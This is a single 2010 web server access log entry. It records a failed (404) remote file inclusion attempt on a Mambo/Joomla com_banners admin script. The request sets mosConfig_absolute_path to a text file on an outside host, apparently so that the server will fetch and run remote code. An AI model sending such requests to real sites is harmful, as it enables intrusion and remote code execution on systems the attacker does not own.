81.177.33.14 - - [30/Apr/2010:21:59:15 -0500] "GET /logs//administrator/components/com_banners/admin.banners.php?mosConfig_absolute_path=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
